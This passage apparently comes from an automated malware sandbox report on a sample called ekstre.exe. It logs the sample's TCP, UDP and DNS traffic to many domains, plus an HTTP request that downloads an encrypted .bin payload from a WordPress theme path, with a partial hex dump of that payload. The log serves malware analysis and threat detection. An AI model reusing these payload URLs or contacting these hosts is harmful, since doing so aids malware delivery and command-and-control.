Mar 30, 2023 10:38:57.988009930 CEST	49804	80	192.168.11.20	34.102.136.180
Mar 30, 2023 10:38:57.988009930 CEST	49804	80	192.168.11.20	34.102.136.180
Mar 30, 2023 10:38:57.995685101 CEST	80	49804	34.102.136.180	192.168.11.20
Mar 30, 2023 10:39:18.213124037 CEST	49806	80	192.168.11.20	185.53.179.90
Mar 30, 2023 10:39:18.231396914 CEST	80	49806	185.53.179.90	192.168.11.20
Mar 30, 2023 10:39:18.231661081 CEST	49806	80	192.168.11.20	185.53.179.90
Mar 30, 2023 10:39:18.250874043 CEST	80	49806	185.53.179.90	192.168.11.20
Mar 30, 2023 10:39:18.251060963 CEST	49806	80	192.168.11.20	185.53.179.90
Mar 30, 2023 10:39:18.269773960 CEST	80	49806	185.53.179.90	192.168.11.20
Mar 30, 2023 10:39:18.269835949 CEST	80	49806	185.53.179.90	192.168.11.20
Mar 30, 2023 10:39:18.269882917 CEST	80	49806	185.53.179.90	192.168.11.20
Mar 30, 2023 10:39:18.270236969 CEST	49806	80	192.168.11.20	185.53.179.90
Mar 30, 2023 10:39:18.270236969 CEST	49806	80	192.168.11.20	185.53.179.90
Mar 30, 2023 10:39:18.289150953 CEST	80	49806	185.53.179.90	192.168.11.20
Mar 30, 2023 10:40:20.779895067 CEST	49809	80	192.168.11.20	198.54.117.215
Mar 30, 2023 10:40:20.942226887 CEST	80	49809	198.54.117.215	192.168.11.20
Mar 30, 2023 10:40:20.942493916 CEST	49809	80	192.168.11.20	198.54.117.215
Mar 30, 2023 10:40:20.942615986 CEST	49809	80	192.168.11.20	198.54.117.215
Mar 30, 2023 10:40:21.104898930 CEST	80	49809	198.54.117.215	192.168.11.20
Mar 30, 2023 10:40:21.104929924 CEST	80	49809	198.54.117.215	192.168.11.20
Mar 30, 2023 10:41:01.456427097 CEST	49811	80	192.168.11.20	23.227.38.74
Mar 30, 2023 10:41:01.464967966 CEST	80	49811	23.227.38.74	192.168.11.20
Mar 30, 2023 10:41:01.465245962 CEST	49811	80	192.168.11.20	23.227.38.74
Mar 30, 2023 10:41:01.465365887 CEST	49811	80	192.168.11.20	23.227.38.74
Mar 30, 2023 10:41:01.473978996 CEST	80	49811	23.227.38.74	192.168.11.20
Mar 30, 2023 10:41:01.489487886 CEST	80	49811	23.227.38.74	192.168.11.20
Mar 30, 2023 10:41:01.489526033 CEST	80	49811	23.227.38.74	192.168.11.20
Mar 30, 2023 10:41:01.489579916 CEST	80	49811	23.227.38.74	192.168.11.20
Mar 30, 2023 10:41:01.489675999 CEST	80	49811	23.227.38.74	192.168.11.20
Mar 30, 2023 10:41:01.489686966 CEST	80	49811	23.227.38.74	192.168.11.20
Mar 30, 2023 10:41:01.489696026 CEST	80	49811	23.227.38.74	192.168.11.20
Mar 30, 2023 10:41:01.489705086 CEST	80	49811	23.227.38.74	192.168.11.20
Mar 30, 2023 10:41:01.489818096 CEST	49811	80	192.168.11.20	23.227.38.74
Mar 30, 2023 10:41:01.490197897 CEST	49811	80	192.168.11.20	23.227.38.74
Mar 30, 2023 10:41:01.490247011 CEST	49811	80	192.168.11.20	23.227.38.74
Mar 30, 2023 10:41:21.964562893 CEST	49813	80	192.168.11.20	23.27.72.143
Mar 30, 2023 10:41:22.134147882 CEST	80	49813	23.27.72.143	192.168.11.20
Mar 30, 2023 10:41:22.134782076 CEST	49813	80	192.168.11.20	23.27.72.143
Mar 30, 2023 10:41:22.136022091 CEST	49813	80	192.168.11.20	23.27.72.143
Mar 30, 2023 10:41:22.307423115 CEST	80	49813	23.27.72.143	192.168.11.20
Mar 30, 2023 10:41:22.307528973 CEST	80	49813	23.27.72.143	192.168.11.20
Mar 30, 2023 10:41:22.307995081 CEST	49813	80	192.168.11.20	23.27.72.143
Mar 30, 2023 10:41:22.307995081 CEST	49813	80	192.168.11.20	23.27.72.143
Mar 30, 2023 10:41:22.477719069 CEST	80	49813	23.27.72.143	192.168.11.20
Mar 30, 2023 10:42:03.441274881 CEST	49821	80	192.168.11.20	76.223.105.230
Mar 30, 2023 10:42:03.451498032 CEST	80	49821	76.223.105.230	192.168.11.20
Mar 30, 2023 10:42:03.451786995 CEST	49821	80	192.168.11.20	76.223.105.230
Mar 30, 2023 10:42:03.452018976 CEST	49821	80	192.168.11.20	76.223.105.230
Mar 30, 2023 10:42:03.462755919 CEST	80	49821	76.223.105.230	192.168.11.20
Mar 30, 2023 10:42:03.470536947 CEST	80	49821	76.223.105.230	192.168.11.20
Mar 30, 2023 10:42:03.470550060 CEST	80	49821	76.223.105.230	192.168.11.20
Mar 30, 2023 10:42:03.470855951 CEST	49821	80	192.168.11.20	76.223.105.230
Mar 30, 2023 10:42:03.470855951 CEST	49821	80	192.168.11.20	76.223.105.230
Mar 30, 2023 10:42:03.481753111 CEST	80	49821	76.223.105.230	192.168.11.20
Mar 30, 2023 10:43:24.730752945 CEST	49828	80	192.168.11.20	23.227.38.74
Mar 30, 2023 10:43:24.739556074 CEST	80	49828	23.227.38.74	192.168.11.20
Mar 30, 2023 10:43:24.739801884 CEST	49828	80	192.168.11.20	23.227.38.74
Mar 30, 2023 10:43:24.739881039 CEST	49828	80	192.168.11.20	23.227.38.74
Mar 30, 2023 10:43:24.748680115 CEST	80	49828	23.227.38.74	192.168.11.20
Mar 30, 2023 10:43:24.764803886 CEST	80	49828	23.227.38.74	192.168.11.20
Mar 30, 2023 10:43:24.764875889 CEST	80	49828	23.227.38.74	192.168.11.20
Mar 30, 2023 10:43:24.764931917 CEST	80	49828	23.227.38.74	192.168.11.20
Mar 30, 2023 10:43:24.764986038 CEST	80	49828	23.227.38.74	192.168.11.20
Mar 30, 2023 10:43:24.765036106 CEST	80	49828	23.227.38.74	192.168.11.20
Mar 30, 2023 10:43:24.765080929 CEST	80	49828	23.227.38.74	192.168.11.20
Mar 30, 2023 10:43:24.765176058 CEST	49828	80	192.168.11.20	23.227.38.74
Mar 30, 2023 10:43:24.765276909 CEST	49828	80	192.168.11.20	23.227.38.74
Mar 30, 2023 10:43:24.765325069 CEST	49828	80	192.168.11.20	23.227.38.74
Mar 30, 2023 10:43:24.765353918 CEST	80	49828	23.227.38.74	192.168.11.20
Mar 30, 2023 10:43:24.765566111 CEST	49828	80	192.168.11.20	23.227.38.74
Mar 30, 2023 10:43:45.081708908 CEST	49829	80	192.168.11.20	213.186.33.5
Mar 30, 2023 10:43:45.101442099 CEST	80	49829	213.186.33.5	192.168.11.20
Mar 30, 2023 10:43:45.101682901 CEST	49829	80	192.168.11.20	213.186.33.5
Mar 30, 2023 10:43:45.101746082 CEST	49829	80	192.168.11.20	213.186.33.5
Mar 30, 2023 10:43:45.122507095 CEST	80	49829	213.186.33.5	192.168.11.20
Mar 30, 2023 10:43:45.122572899 CEST	80	49829	213.186.33.5	192.168.11.20
Mar 30, 2023 10:43:45.122922897 CEST	49829	80	192.168.11.20	213.186.33.5
Mar 30, 2023 10:43:45.122922897 CEST	49829	80	192.168.11.20	213.186.33.5
Mar 30, 2023 10:43:45.142754078 CEST	80	49829	213.186.33.5	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 30, 2023 10:37:15.566097975 CEST	64335	53	192.168.11.20	1.1.1.1
Mar 30, 2023 10:37:15.781132936 CEST	53	64335	1.1.1.1	192.168.11.20
Mar 30, 2023 10:37:36.482506037 CEST	60211	53	192.168.11.20	1.1.1.1
Mar 30, 2023 10:37:36.643882990 CEST	53	60211	1.1.1.1	192.168.11.20
Mar 30, 2023 10:37:56.837537050 CEST	62572	53	192.168.11.20	1.1.1.1
Mar 30, 2023 10:37:56.906554937 CEST	53	62572	1.1.1.1	192.168.11.20
Mar 30, 2023 10:38:17.114669085 CEST	58924	53	192.168.11.20	1.1.1.1
Mar 30, 2023 10:38:17.127454996 CEST	53	58924	1.1.1.1	192.168.11.20
Mar 30, 2023 10:38:37.266084909 CEST	62926	53	192.168.11.20	1.1.1.1
Mar 30, 2023 10:38:37.298423052 CEST	53	62926	1.1.1.1	192.168.11.20
Mar 30, 2023 10:38:37.298825979 CEST	62926	53	192.168.11.20	9.9.9.9
Mar 30, 2023 10:38:37.362363100 CEST	53	62926	9.9.9.9	192.168.11.20
Mar 30, 2023 10:38:57.839715958 CEST	54072	53	192.168.11.20	1.1.1.1
Mar 30, 2023 10:38:57.856093884 CEST	53	54072	1.1.1.1	192.168.11.20
Mar 30, 2023 10:39:18.132260084 CEST	61250	53	192.168.11.20	1.1.1.1
Mar 30, 2023 10:39:18.212342978 CEST	53	61250	1.1.1.1	192.168.11.20
Mar 30, 2023 10:40:00.576041937 CEST	63965	53	192.168.11.20	1.1.1.1
Mar 30, 2023 10:40:00.587882996 CEST	53	63965	1.1.1.1	192.168.11.20
Mar 30, 2023 10:40:20.727760077 CEST	53081	53	192.168.11.20	1.1.1.1
Mar 30, 2023 10:40:20.778938055 CEST	53	53081	1.1.1.1	192.168.11.20
Mar 30, 2023 10:40:41.254511118 CEST	50452	53	192.168.11.20	1.1.1.1
Mar 30, 2023 10:40:41.289769888 CEST	53	50452	1.1.1.1	192.168.11.20
Mar 30, 2023 10:41:01.437612057 CEST	50040	53	192.168.11.20	1.1.1.1
Mar 30, 2023 10:41:01.455604076 CEST	53	50040	1.1.1.1	192.168.11.20
Mar 30, 2023 10:41:21.636491060 CEST	51169	53	192.168.11.20	1.1.1.1
Mar 30, 2023 10:41:21.963612080 CEST	53	51169	1.1.1.1	192.168.11.20
Mar 30, 2023 10:41:42.459872961 CEST	51212	53	192.168.11.20	1.1.1.1
Mar 30, 2023 10:41:42.581332922 CEST	53	51212	1.1.1.1	192.168.11.20
Mar 30, 2023 10:41:42.581660032 CEST	51212	53	192.168.11.20	9.9.9.9
Mar 30, 2023 10:41:43.277278900 CEST	53	51212	9.9.9.9	192.168.11.20
Mar 30, 2023 10:42:03.423933029 CEST	58625	53	192.168.11.20	1.1.1.1
Mar 30, 2023 10:42:03.440603018 CEST	53	58625	1.1.1.1	192.168.11.20
Mar 30, 2023 10:42:23.622808933 CEST	57552	53	192.168.11.20	1.1.1.1
Mar 30, 2023 10:42:24.018583059 CEST	53	57552	1.1.1.1	192.168.11.20
Mar 30, 2023 10:42:24.019207954 CEST	57552	53	192.168.11.20	9.9.9.9
Mar 30, 2023 10:42:25.028302908 CEST	57552	53	192.168.11.20	9.9.9.9
Mar 30, 2023 10:42:25.721076965 CEST	53	57552	9.9.9.9	192.168.11.20
Mar 30, 2023 10:42:26.830954075 CEST	53	57552	9.9.9.9	192.168.11.20
Mar 30, 2023 10:42:51.679778099 CEST	61649	53	192.168.11.20	1.1.1.1
Mar 30, 2023 10:42:51.691318035 CEST	53	61649	1.1.1.1	192.168.11.20
Mar 30, 2023 10:43:03.770122051 CEST	56069	53	192.168.11.20	1.1.1.1
Mar 30, 2023 10:43:04.545052052 CEST	53	56069	1.1.1.1	192.168.11.20
Mar 30, 2023 10:43:24.687578917 CEST	60239	53	192.168.11.20	1.1.1.1
Mar 30, 2023 10:43:24.729487896 CEST	53	60239	1.1.1.1	192.168.11.20
Mar 30, 2023 10:43:44.917514086 CEST	61394	53	192.168.11.20	1.1.1.1
Mar 30, 2023 10:43:45.080868959 CEST	53	61394	1.1.1.1	192.168.11.20
Mar 30, 2023 10:44:05.272327900 CEST	59860	53	192.168.11.20	1.1.1.1
Mar 30, 2023 10:44:05.320945024 CEST	53	59860	1.1.1.1	192.168.11.20
Mar 30, 2023 10:44:05.321388960 CEST	59860	53	192.168.11.20	9.9.9.9
Mar 30, 2023 10:44:05.586775064 CEST	53	59860	9.9.9.9	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 30, 2023 10:37:15.566097975 CEST	192.168.11.20	1.1.1.1	0x1f88	Standard query (0)	www.couragetokingdom.com	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:37:36.482506037 CEST	192.168.11.20	1.1.1.1	0x56fb	Standard query (0)	www.canadianbreederprogram.com	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:37:56.837537050 CEST	192.168.11.20	1.1.1.1	0x7dd8	Standard query (0)	www.credit-cards-54889.com	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:38:17.114669085 CEST	192.168.11.20	1.1.1.1	0xcbd3	Standard query (0)	www.aux100000epices.com	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:38:37.266084909 CEST	192.168.11.20	1.1.1.1	0x672c	Standard query (0)	www.funtime28.online	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:38:37.298825979 CEST	192.168.11.20	9.9.9.9	0x672c	Standard query (0)	www.funtime28.online	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:38:57.839715958 CEST	192.168.11.20	1.1.1.1	0x441c	Standard query (0)	www.bizformspro.com	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:39:18.132260084 CEST	192.168.11.20	1.1.1.1	0xb607	Standard query (0)	www.furniture-61686.com	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:40:00.576041937 CEST	192.168.11.20	1.1.1.1	0x715f	Standard query (0)	www.fluffyjet.online	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:40:20.727760077 CEST	192.168.11.20	1.1.1.1	0x63e	Standard query (0)	www.crosswalkconsulting.co.uk	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:40:41.254511118 CEST	192.168.11.20	1.1.1.1	0xc12f	Standard query (0)	www.bellvaniamail.com	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:41:01.437612057 CEST	192.168.11.20	1.1.1.1	0xf2b7	Standard query (0)	www.textare.net	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:41:21.636491060 CEST	192.168.11.20	1.1.1.1	0x13a9	Standard query (0)	www.peterslawonline.com	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:41:42.459872961 CEST	192.168.11.20	1.1.1.1	0xde3f	Standard query (0)	www.doctorlinkscsk.link	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:41:42.581660032 CEST	192.168.11.20	9.9.9.9	0xde3f	Standard query (0)	www.doctorlinkscsk.link	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:42:03.423933029 CEST	192.168.11.20	1.1.1.1	0x706d	Standard query (0)	www.irestoreart.com	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:42:23.622808933 CEST	192.168.11.20	1.1.1.1	0xcc4d	Standard query (0)	www.tmcgroup.africa	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:42:24.019207954 CEST	192.168.11.20	9.9.9.9	0xcc4d	Standard query (0)	www.tmcgroup.africa	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:42:25.028302908 CEST	192.168.11.20	9.9.9.9	0xcc4d	Standard query (0)	www.tmcgroup.africa	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:42:51.679778099 CEST	192.168.11.20	1.1.1.1	0xbf2a	Standard query (0)	www.fluffyjet.online	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:43:03.770122051 CEST	192.168.11.20	1.1.1.1	0xe3e1	Standard query (0)	www.leqidt.tax	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:43:24.687578917 CEST	192.168.11.20	1.1.1.1	0x4eb8	Standard query (0)	www.textare.net	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:43:44.917514086 CEST	192.168.11.20	1.1.1.1	0x45c5	Standard query (0)	www.laxmi.digital	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:44:05.272327900 CEST	192.168.11.20	1.1.1.1	0xe867	Standard query (0)	www.fornettobarbecues.com	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:44:05.321388960 CEST	192.168.11.20	9.9.9.9	0xe867	Standard query (0)	www.fornettobarbecues.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 30, 2023 10:37:15.781132936 CEST	1.1.1.1	192.168.11.20	0x1f88	No error (0)	www.couragetokingdom.com	couragetokingdom.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 30, 2023 10:37:15.781132936 CEST	1.1.1.1	192.168.11.20	0x1f88	No error (0)	couragetokingdom.com		122.201.64.145	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:37:36.643882990 CEST	1.1.1.1	192.168.11.20	0x56fb	No error (0)	www.canadianbreederprogram.com	canadianbreederprogram.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 30, 2023 10:37:36.643882990 CEST	1.1.1.1	192.168.11.20	0x56fb	No error (0)	canadianbreederprogram.com		15.197.142.173	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:37:36.643882990 CEST	1.1.1.1	192.168.11.20	0x56fb	No error (0)	canadianbreederprogram.com		3.33.152.147	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:37:56.906554937 CEST	1.1.1.1	192.168.11.20	0x7dd8	No error (0)	www.credit-cards-54889.com		185.53.179.91	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:38:17.127454996 CEST	1.1.1.1	192.168.11.20	0xcbd3	Name error (3)	www.aux100000epices.com	none	none	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:38:37.298423052 CEST	1.1.1.1	192.168.11.20	0x672c	Server failure (2)	www.funtime28.online	none	none	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:38:37.362363100 CEST	9.9.9.9	192.168.11.20	0x672c	No error (0)	www.funtime28.online	funtime28.online		CNAME (Canonical name)	IN (0x0001)	false
Mar 30, 2023 10:38:37.362363100 CEST	9.9.9.9	192.168.11.20	0x672c	No error (0)	funtime28.online		195.179.237.158	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:38:57.856093884 CEST	1.1.1.1	192.168.11.20	0x441c	No error (0)	www.bizformspro.com	bizformspro.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 30, 2023 10:38:57.856093884 CEST	1.1.1.1	192.168.11.20	0x441c	No error (0)	bizformspro.com		34.102.136.180	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:39:18.212342978 CEST	1.1.1.1	192.168.11.20	0xb607	No error (0)	www.furniture-61686.com		185.53.179.90	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:40:00.587882996 CEST	1.1.1.1	192.168.11.20	0x715f	Name error (3)	www.fluffyjet.online	none	none	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:40:20.778938055 CEST	1.1.1.1	192.168.11.20	0x63e	No error (0)	www.crosswalkconsulting.co.uk	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 30, 2023 10:40:20.778938055 CEST	1.1.1.1	192.168.11.20	0x63e	No error (0)	parkingpage.namecheap.com		198.54.117.215	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:40:20.778938055 CEST	1.1.1.1	192.168.11.20	0x63e	No error (0)	parkingpage.namecheap.com		198.54.117.216	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:40:20.778938055 CEST	1.1.1.1	192.168.11.20	0x63e	No error (0)	parkingpage.namecheap.com		198.54.117.212	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:40:20.778938055 CEST	1.1.1.1	192.168.11.20	0x63e	No error (0)	parkingpage.namecheap.com		198.54.117.211	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:40:20.778938055 CEST	1.1.1.1	192.168.11.20	0x63e	No error (0)	parkingpage.namecheap.com		198.54.117.210	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:40:20.778938055 CEST	1.1.1.1	192.168.11.20	0x63e	No error (0)	parkingpage.namecheap.com		198.54.117.217	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:40:20.778938055 CEST	1.1.1.1	192.168.11.20	0x63e	No error (0)	parkingpage.namecheap.com		198.54.117.218	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:40:41.289769888 CEST	1.1.1.1	192.168.11.20	0xc12f	Name error (3)	www.bellvaniamail.com	none	none	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:41:01.455604076 CEST	1.1.1.1	192.168.11.20	0xf2b7	No error (0)	www.textare.net	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 30, 2023 10:41:01.455604076 CEST	1.1.1.1	192.168.11.20	0xf2b7	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:41:21.963612080 CEST	1.1.1.1	192.168.11.20	0x13a9	No error (0)	www.peterslawonline.com		23.27.72.143	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:41:42.581332922 CEST	1.1.1.1	192.168.11.20	0xde3f	Server failure (2)	www.doctorlinkscsk.link	none	none	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:41:43.277278900 CEST	9.9.9.9	192.168.11.20	0xde3f	Server failure (2)	www.doctorlinkscsk.link	none	none	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:42:03.440603018 CEST	1.1.1.1	192.168.11.20	0x706d	No error (0)	www.irestoreart.com	irestoreart.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 30, 2023 10:42:03.440603018 CEST	1.1.1.1	192.168.11.20	0x706d	No error (0)	irestoreart.com		76.223.105.230	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:42:03.440603018 CEST	1.1.1.1	192.168.11.20	0x706d	No error (0)	irestoreart.com		13.248.243.5	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:42:24.018583059 CEST	1.1.1.1	192.168.11.20	0xcc4d	Server failure (2)	www.tmcgroup.africa	none	none	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:42:25.721076965 CEST	9.9.9.9	192.168.11.20	0xcc4d	Server failure (2)	www.tmcgroup.africa	none	none	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:42:26.830954075 CEST	9.9.9.9	192.168.11.20	0xcc4d	Server failure (2)	www.tmcgroup.africa	none	none	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:42:51.691318035 CEST	1.1.1.1	192.168.11.20	0xbf2a	Name error (3)	www.fluffyjet.online	none	none	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:43:04.545052052 CEST	1.1.1.1	192.168.11.20	0xe3e1	Name error (3)	www.leqidt.tax	none	none	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:43:24.729487896 CEST	1.1.1.1	192.168.11.20	0x4eb8	No error (0)	www.textare.net	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 30, 2023 10:43:24.729487896 CEST	1.1.1.1	192.168.11.20	0x4eb8	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:43:45.080868959 CEST	1.1.1.1	192.168.11.20	0x45c5	No error (0)	www.laxmi.digital		213.186.33.5	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:44:05.320945024 CEST	1.1.1.1	192.168.11.20	0xe867	Server failure (2)	www.fornettobarbecues.com	none	none	A (IP address)	IN (0x0001)	false
Mar 30, 2023 10:44:05.586775064 CEST	9.9.9.9	192.168.11.20	0xe867	Server failure (2)	www.fornettobarbecues.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

34.138.169.8

www.couragetokingdom.com

www.canadianbreederprogram.com

www.credit-cards-54889.com

www.funtime28.online

www.bizformspro.com

www.furniture-61686.com

www.crosswalkconsulting.co.uk

www.textare.net

www.peterslawonline.com

www.irestoreart.com

www.laxmi.digital

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49790	34.138.169.8	80	C:\Users\user\Desktop\ekstre.exe

Timestamp	kBytes transferred	Direction	Data
Mar 30, 2023 10:36:18.142750978 CEST	170	OUT	GET /wp-content/themes/seotheme/RenHLfAoTIbu98.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: 34.138.169.8 Cache-Control: no-cache
Mar 30, 2023 10:36:18.283761978 CEST	172	IN	HTTP/1.1 200 OK Date: Thu, 30 Mar 2023 08:36:18 GMT Server: Apache/2.4.51 (Unix) OpenSSL/1.1.1n Last-Modified: Tue, 21 Mar 2023 22:37:46 GMT ETag: "2e640-5f770b150a4e5" Accept-Ranges: bytes Content-Length: 190016 Content-Type: application/octet-stream Data Raw: ee c1 3a 56 68 91 54 04 6d 29 61 8f a0 97 9f 6f e2 1d 3c 3e f0 c1 f3 d6 08 75 33 de a3 b4 39 f2 60 3a ec 4c 90 62 3f e2 71 25 67 d1 d4 4a 07 fc 15 ac 43 da e3 00 7b 52 84 5a a4 39 ff a1 5f c8 c1 82 a6 c5 86 6a 11 9b 88 16 a2 d7 bd dc c6 13 ad 20 c0 98 ac 98 ea 0d eb 22 56 59 41 0b db 88 3f 9d 4d cc 8a 8a 33 74 2c e2 bb e0 77 3b ba a5 f0 99 c1 e9 7f 7d c0 7f 1c ca e9 8e de 33 d1 36 42 13 28 49 2c 6e 80 b6 90 a1 9b cc 6a 23 a8 76 35 92 45 ae ab 31 34 b6 60 74 ca 46 58 59 4e a8 d4 8a 37 18 66 34 52 4f a5 35 e5 1f c3 0d b5 64 61 c4 0c f7 37 7d f1 55 b8 2e 8f 60 30 af 6d 09 44 e4 bc 8a 19 99 0f e2 64 ad 4b c0 32 10 0a af 71 20 c4 51 af 91 ad b8 34 a5 a8 e3 4c 4d 8f 3a 79 14 d8 db 81 c4 00 7a 2a 76 33 58 d3 f7 42 32 2f b6 4f 3e 79 c0 74 6c ff f6 f8 75 40 3b 07 69 56 38 13 b6 4a 25 e6 94 ff 61 0a 11 99 fe cd e2 20 1e 89 03 1c 74 fc f0 30 4d f6 4c 23 e4 01 ef 87 fa 7f e3 5b 04 a9 09 16 fc e2 ea 14 c9 7f 82 b8 59 2a 83 40 78 37 9c 7d e8 d6 b2 bd 4a fe db 06 62 b4 4b 44 34 3a 5a fd e0 6a 81 e0 99 ac 37 e6 c9 0a 55 51 cd 2e 7e 8b eb e8 8b 5c 65 0f 72 00 38 7e 32 61 e9 7e 4f 5c ad 3e a1 cf c1 71 b2 d9 33 cc e1 6e c9 9a 3f ee 06 3f 9f ba 23 f3 a3 7d f1 dc 66 52 93 12 06 0a 35 9c f7 60 02 02 cb dd bd 4f 70 e2 01 bd 76 93 2a a7 1f 95 3b 3c f5 94 1b 04 a1 78 c2 05 75 06 4c 37 19 e3 7f c4 12 e9 cf 49 be 7b b5 b0 2a 47 cf 89 54 ab 8f b7 bb 4d 23 e0 22 46 4d 62 28 8b 74 67 f7 07 17 42 cd 69 06 f7 75 eb dd ab af 54 52 5e da 25 eb c9 70 1d 7c 27 a1 83 e6 20 06 88 a4 d1 13 6a 73 92 12 19 d0 c1 3d e4 dd ff b4 d5 24 f6 37 a5 ce 60 8f 3c e0 1a d1 b4 54 96 59 f2 87 ae 7d 48 74 9e e7 5f 26 36 c9 58 a4 f1 07 4e c2 3e b9 86 49 b7 b5 71 2c b5 32 44 1e e4 67 2b f7 a4 09 2c 2b 0f 91 a9 02 42 ef 0a 8c 20 08 fe d1 34 c7 a0 f9 46 dd 3c ea ee d8 78 91 1a f7 69 0c 05 8c 91 4a 22 12 8e 7c aa 91 a6 90 ac 50 33 ea 4f 6b 07 71 c8 34 73 b3 63 fa ff ce 7c 19 db 29 e4 77 96 64 03 d0 b9 6b 03 5d 1a 1d ff 5e 1b 9f b2 54 d1 0e 98 aa f9 65 e7 cd 01 8b 9d 83 8a 11 f3 4b 5f d6 b9 2f b0 c7 a8 b7 ab 5d 37 0c 7f d6 01 ea 4b 21 61 63 18 99 e4 a3 1c c6 9f 32 68 f5 62 a7 e4 8a e4 e4 f8 d0 34 b5 06 aa 1f 06 f6 49 8b 19 4e 24 0b a5 39 51 1c 4b 49 1c 91 a9 87 28 5b d0 bd 82 89 79 8c ce d0 14 31 f2 98 52 1b e0 57 09 bf cc 54 62 3d d2 18 8a 49 d3 bb 59 32 e2 79 a8 c5 bf b8 46 9f 31 75 00 89 2a 6e da 4d 3a 89 73 ba 21 24 32 ce 30 62 19 8b 73 82 75 73 90 ba 3a 8c 29 4d 21 0e 29 39 87 7b a3 74 6f 72 f3 e3 f0 f3 98 30 11 63 31 76 b1 77 ab 38 f7 36 82 1a 3e ab e6 f0 19 f6 25 d3 14 2d 89 73 fe be d5 a6 e9 29 9b 2c f6 01 7a e9 c9 d5 ec 16 6a f5 6a c7 91 96 3f 07 d5 d9 05 4f 48 8a b0 7c b7 40 07 b8 8f 0f f1 d5 08 90 ac 18 b4 d8 57 7e 0b b4 31 ff 5d f2 8f 94 73 82 a9 45 72 ec 96 44 06 e4 ea 3c 20 20 da 1b 96 a4 4b 1f 8c d8 e3 97 6e 6a 11 9b 88 4e 21 3f b4 57 0e 90 6d 1c 4b 98 af 59 69 cd c3 21 5e a6 a0 9b db 88 3f 9d 4d cc 8a 8a 33 74 2c e2 bb e0 77 3b ba a5 f0 99 c1 e9 7f 7d c0 7f 1c ca e9 8e 1e 33 d1 36 4c 0c 92 47 2c da 89 7b b1 19 9a 80 a7 02 fc 1e 5c e1 65 de d9 5e 53 c4 01 19 ea 25 39 37 20 c7 a0 aa 55 7d 46 46 27 21 85 5c 8b 3f 87 42 e6 44 0c ab 68 92 19 70 fc 5f 9c 2e 8f 60 30 Data Ascii: :VhTm)ao<>u39`:Lb?q%gJC{RZ9_j "VYA?M3t,w;}36B(I,nj#v5E14`tFXYN7f4RO5da7}U.`0mDdK2q Q4LM:yzv3XB2/O>ytlu@;iV8J%a t0ML#[Y@x7}JbKD4:Zj7UQ.~\er8~2a~O\>q3n??#}fR5`Opv;<xuL7I{GTM#"FMb(tgBiuTR^%p\|' 